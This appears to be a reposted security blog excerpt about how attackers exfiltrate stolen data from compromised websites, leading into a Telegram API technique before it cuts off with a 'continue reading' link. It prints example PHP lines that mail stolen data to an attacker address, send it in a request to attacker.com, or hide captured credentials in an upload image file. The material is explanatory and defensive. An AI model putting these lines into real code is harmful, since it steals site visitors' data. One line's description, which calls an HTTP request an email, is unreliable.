Global CyberSecurity

Server Side Data Exfiltration via Telegram API

0

Published on 03/18/2021 – Last Updated on 03/18/2021 by OTC

One of the themes commonly highlighted on this blog includes the many creative methods and techniques attackers employ to steal data from compromised websites. Credit card skimmers, credential and password hijackers, SQL injections, and even malware on the server level can be used for data exfiltration.

What’s more, attackers may be able to accomplish this feat with a few mere lines of code. For example:

Emailing the data:

@mail(“email@attacker.com”, $_SERVER[“SERVER_NAME”], $stolenData);

Writing the data to a local file:

fwrite($fh, $stolenData);

Sending the data to an email address under the attacker’s control:

@file_get_contents(“http://attacker.com/cgi-bin/optimus.pl?prime=$stolenData”);

Writing the data to an image file within the website to avoid raising suspicion:

$hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’);
$write=fwrite($hellowp,$username_password,$time);

Harvesting & Exfiltrating Stolen Data via Telegram

One interesting technique our team has come across in recent months leverages the Telegram API to exfiltrate stolen data and send it in a private message to a bot under the attackers control.

Continue reading Server Side Data Exfiltration via Telegram API at Sucuri Blog.

New resources for video SEO

Previous article

Every Metric Is A Vanity Metric

Next article

You may also like

Comments

Comments are closed.